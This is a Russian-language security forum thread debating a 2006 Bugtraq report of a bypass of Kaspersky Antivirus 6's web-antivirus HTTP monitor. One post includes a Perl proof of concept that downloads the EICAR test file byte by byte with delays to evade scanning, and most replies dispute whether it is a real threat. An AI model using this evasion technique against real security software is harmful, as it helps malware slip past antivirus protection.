nobody@nowhere

Kaspersky antivirus 6: HTTP monitor bypassing

В этой теме 84 сообщений

http://www.securityfocus.com/archive/1/434827 :

Kaspersky antivirus 6: HTTP monitor bypassing May 22 2006 08:09PM

Kaspersky antivirus 6

Kaspersky internet security 6

www.kaspersky.com

Vulnerable Systems: KAV6, KIS6

Detail:

The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus).

Any mailicious software on local computer can bypass HTTP virus monitor.

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Блин, не успели зарелизить, уже уязвимость нашли ...

Интересно посмотреть, насколько быстро запатчат... Надеюсь, что запатчат.

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

john

Сергей Ильин

вспоминаем, о чём это говорит???

О ВЫСОКОЙ ПОПУЛЯРНОСТИ :)

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
john

Сергей Ильин

вспоминаем, о чём это говорит???

О ВЫСОКОЙ ПОПУЛЯРНОСТИ :)

Linux популярнее © ROC FAQ

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

ну можно вспомнить певицу Мадонну, она то точно популярнее и известнее Линукса..

А можно блендер с мотоциклом сравнивать..и там и там мотор есть.

Добавлено спустя 7 минут 54 секунды:

вдруг кто не сходит ссылке не почитает..

BugTraq

Back to list | Post reply

Kaspersky antivirus 6: HTTP monitor bypassing May 22 2006 08:09PM

john kak-sam to

Kaspersky antivirus 6

Kaspersky internet security 6

www.kaspersky.com

Vulnerable Systems: KAV6, KIS6

Detail:

The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus).

Any mailicious software on local computer can bypass HTTP virus monitor.

Solution:

There is no known solution.

Exploit code:

This perl script could be run with ActiveState Perl 5.8:

use IO::Socket::INET;

use strict;

my( $h_srv, $h_port, $h_url ) = ( 'www.eicar.com', 'http(80)',

'http://www.eicar.com/download/eicar.com' );

syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)n";

my $s = IO::Socket::INET->new( PeerAddr => $h_srv,

PeerPort => $h_port,

Proto => 'tcp' );

die "socket: $!" unless $s;

sendthem( $s,

"GET $h_url HTTP/1.1",

"Host: $h_srv",

""

);

my $doc = read_body( $s, read_headers( $s ) );

syswrite STDOUT,

'document is <'.$doc.'> len='.length($doc)."n";

sub sendthem {

my $s = shift;

my $c = 0;

foreach( @_ ) {

my @a = split //, $_;

++$c;

syswrite STDOUT, "query $c: ";

foreach( @a ) {

sendone( $s, $_ );

}

sendone( $s, "r" );

sendone( $s, "n" );

}

}

sub sendone {

my( $s, $v ) = @_;

$s->syswrite( $v );

syswrite STDOUT, $v;

# !!! comment next line to have monitoring working ;)

select( undef, undef, undef, 0.300 );

}

sub read_headers {

my( $s ) = @_;

my( $c, $cl ) = ( 0, 0 );

for( ;; ) {

my $l = read_line( $s );

++$c;

syswrite STDOUT, "header $c: $l";

syswrite STDOUT, "rn";

last if not $l and $c;

$cl = $1 if $l =~ /^Content-Length:s+(d+)/;

}

$cl;

}

sub read_line {

my( $s ) = @_;

my $str = '';

for( ;; ) {

my $v = '';

my $r = $s->sysread( $v, 1 );

die 'EOF reading headers!' unless $r;

last if $v eq "n";

next if $v eq "r";

$str .= $v;

}

return $str;

}

sub read_body {

my( $s, $cl ) = @_;

my( $str, $cli ) = ( '', $cl );

syswrite STDOUT, "reading body <content-length: $cli> ...n";

for( ;; ) {

my $v = '';

my $r = $s->sysread( $v, 1 );

last unless $r;

$str .= $v;

--$cl if $cli;

last if not $cl and $cli;

}

return $str;

}

Добавлено спустя 1 минуту 18 секунд:

Кстати, это ещё не уязвимость и даже не кандидат в уязвимости.. Просто сообщение некого

john kak-sam to
0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Этот некто создал этот топик Ж) Война прожолжается...

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

чего-то я не совсем понял смысл..

файл прошедший проверку Веб-Антивирусом, Файловым Антивирусом и Проактивной защитой не проверяется?

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
чего-то я не совсем понял смысл..

файл прошедший проверку Веб-Антивирусом, Файловым Антивирусом и Проактивной защитой не проверяется?

HTTP monitor не имеет понятия о HTTP и не проверяет скаченное вообще. говоря коротко - нет никакого Веб-антивируса кроме как в рекламных агитках.

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
HTTP monitor не имеет понятия о HTTP и не проверяет скаченное вообще. говоря коротко - нет никакого Веб-антивируса кроме как в рекламных агитках.

ну допустим, зачем надо было городить огороды.. Для секурити фокус достаточно одной фразы.

чтобы немного прояснить ситуацию был проведён маленький тест, линк с вирусом в закрытой ветке (vir.gif)

ну и тест, теста (vir2.gif)

пусть все остальные мониторы выключены (vir3.gif)

А вот с ssl не так всё просто :(

vir.gif

vir2.gif

vir3.gif

post-36-1148455993.gif

post-1-1148455993.gif

post-1-1148455994.gif

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
HTTP monitor не имеет понятия о HTTP и не проверяет скаченное вообще. говоря коротко - нет никакого Веб-антивируса кроме как в рекламных агитках.

ну допустим, зачем надо было городить огороды.. Для секурити фокус достаточно одной фразы.

чтобы немного прояснить ситуацию был проведён маленький тест, линк с вирусом в закрытой ветке (vir.gif)

тест чего и на что?

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ответ разработчика ЛК читайте здесь: http://forum.kaspersky.com/index.php?showt...st&p=120245.

А вот с ssl не так всё просто

Проверка ссл-трафика веб-антивирусом появится в MP1 (уже добавлена в бетах).

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
тест чего и на что?

тест формальной работоспособности веб-антивируса.

Работоспособность фиксировалась по выпадающему окну с напдписью ВЕБ-Антивирус

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
тест чего и на что?

тест формальной работоспособности веб-антивируса.

Работоспособность фиксировалась по выпадающему окну с напдписью ВЕБ-Антивирус

а. осталось троянописателей убедить запускать IE для качанья, они люди злобные и подстраиваться так что бы KAV им не давал качать не будут. ;) было бы не смешно, а просто печально если бы под IE оно тоже пропускало вирусы.

Добавлено спустя 6 минут 48 секунд:

Блин, не успели зарелизить, уже уязвимость нашли ...

читайте интерью Данилова - "поделия ученика 11 класса", ну и все отсюда вытекающее.

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

дайте линк, может что-то проясниться.

Тут фишка вот в чём, работа данного Антивируса инвариантна к браузеру.. по одной простой причине, запрос и ответ проходят через монитор.

Вот пример с оперой

vir4.gif

post-36-1148459453.gif

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

На самом деле, эта дыра в КАВ и КИС не критична, ведь файл передающийся через HTTP, будет все равно проверен монитором на винте, разве нет?

Т.е. проверка HTTP трафика на лету это вообще мера избыточная по сути. Но все равно не приятно, что баг нашли сразу после релиза :(

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
дайте линк, может что-то проясниться.

Тут фишка вот в чём, работа данного Антивируса инвариантна к браузеру.. по одной простой причине, запрос и ответ проходят через монитор.

Вот пример с оперой

линк на что?

проходят. но монитор их не видит.

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Сергей Ильин

дыра ли это..и вообще.. подождём что напишут на www.securityfocus.com

Господин утверждает, что веб-антивирус в принципе не работает.

линк на что?
интерью Данилова - "поделия ученика 11 класса
0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
На самом деле, эта дыра в КАВ и КИС не критична, ведь файл передающийся через HTTP, будет все равно проверен монитором на винте, разве нет?

нет. дырки в IE эксплуатируются в полный рост. в iframe, рендеринг картинок - впомните как специальные bmp роняли всю винду. да и просто вредоносный javascript. браузер ничего из этого на диск записывать не будет, он мило отработает. даже если запись в кэш будет остановлена - поздно уже.

Т.е. проверка HTTP трафика на лету это вообще мера избыточная по сути. Но все равно не приятно, что баг нашли сразу после релиза :(

каков уровень авторов и их знания технологии таков и результат

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
javascript

с файловой системой напрямую не работает.

Добавлено спустя 8 минут 38 секунд:

есть одно замечаение, www.securityfocus.com принадлежит конкуренту каспера - семантику. Мне кажется, если, указанная выше, уязвимость была очень серьёзной, то семантик бы первый крикнул.. типа ВОТ ВАМ..

хотя с другой стороны, кто его знает.. что там в голове у семантика :))))

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Я запустил зловещий скрипт, долго смотрел на приведённый ниже алерт, задавая себе вопрос "А где прикол?"... И потом до меня вдруг дошло! Ну конечно же! john, я наконец-то всё понял! Ведь это же алерт Анти-Хакера! То есть фаервола! То есть такой штуки, которой в Dr.Web, как бы это сказать, нету... Именно поэтому вы не учли, что такой алерт появится, если вы вместо стандартного браузера или даунлоадера (для защиты которых создан компонент Web-Antivirus в КИС 6) используете ваш самописный скрипт, запущенный на компе клиента. Что ж, не страшно, с кем не бывает...

Вот на всякий случай, может понадобится кому...=) http://exler.ru/expromt/12-01-2005.htm

ah1.JPG

post-198-1148463281.jpg

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Dmitry Perets, ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
дайте линк, может что-то проясниться.

Прояснится только то, что в моём длинном посте про Dr.Web больше правды, чем кажется на первый взгляд =) Держите линк: http://inesp.ru/download/Interview.rar

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Сергей Ильин

это извращённый реверсивный троян. Как я уже не раз писал, в скрипте нет особой уязвимости и тем более угрозы.

ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

НЕЛЬЗЯ.

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets, ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

Угу, я вам больше скажу. Я подозреваю, что и в КАВ без антихакера эту уязвимость нельзя будет использовать, ибо сработает файловый монитор, когда eicar будет закачан на комп. Давайте так... Чтобы не быть голословным, я вечером это проверю и выложу скриншоты (в том числе и на форуме ЛК, чтобы народ зря не пугался). Просто в универе я это проверить не могу, так как даже если я жму "Разрешить" в антихакере, eicar блокируется внешним фаерволлом универа =(

Ну а пока я проверяю, пусть нам john кинет линк на инет-магазин, где можно купить веб-антивирус производства Dr.Web, который конечно же будет нас защищать от этого зловреда...=)))))) Ведь раз 11-классники уже написали свой Веб-АВ, то у НАСТОЯЩИХ СПЕЦИАЛИСТОВ непременно найдётся гораздо более надёжная защита, правда?

0

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!


Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.


Войти

Anti-Malware.ru Вконтакте   Anti-Malware.ru в Facebook   Anti-Malware.ru в Twitter   Anti-Malware.ru в LinkedIn   RSS
  • Сообщения

    • demkd, приветствую. такое предложение: добавить при работе с образом новый статус "Выделенные". статус присваивать объекту по удобной горячей клавише. (повторное нажатие может снять этот статус) При этом объект со статусом "выделенный" переносится в секцию "подозрительные и вирусы". (если он там не был)  и так же в самой секции "подозрительные" можно изменить статус у объекта ?ВИРУС? или "подозрительные" на "выделенные". не меняется лишь статус у объекта с сигнатурным детектом. + добавить контекстные обработки по выделенным: например, проверить на VT или jotti только "выделенные". добавить в автоскрипт возможность формировать скрипт с учетом "выделенных", т.е. в автоскрипт попадают объекты с сигнатурным детектом (удаляется через chklst/delvir), объекты со статусом ?ВИРУС? удаляются через назначенное действие в базе критериев или через дефолтное (из settings.ini) и "выделенные" удаляются через дефолтный метод удаления. (из settings.ini)   Таким образом, те кто не использует сигнатуры и/или критерии могут хотя бы руками показать, что они хотят удалить, и это затем автоматически попадет в автоскрипт.
    • В понедельник Nintendo объявили о запуске новой программы вознаграждения за найденные уязвимости в линейке своих портативных игровых систем 3DS. Компания предложила от 100 до 20 000 долларов за бреши, которые удастся обнаружить в продукте. Читать далее
    • Служба уведомлений о скомпрометированных данных LeakedSource получила базу данных, содержащую информацию о примерно 85 миллионах  аккаунтах пользователей Dailymotion, включая имена пользователей, адреса электронной почты и, во многих случаях, пароли. Читать далее
    • ESETпредупреждает пользователей Amazon о новой волне фишинга. Мошенники добывают личные данные клиентов, рассылая от лица площадки письма о несуществующей проблеме с заказом. Читать далее
    • Компания IBM и Ponemon Institute опубликовали результаты глобального исследования устойчивости организаций к кибератакам под названием «Cyber Resilient Organization». Согласно результатам исследования, только 32% специалистов в сфере ИТ и безопасности считают, что их компании имеют высокий уровень киберзащиты. Читать далее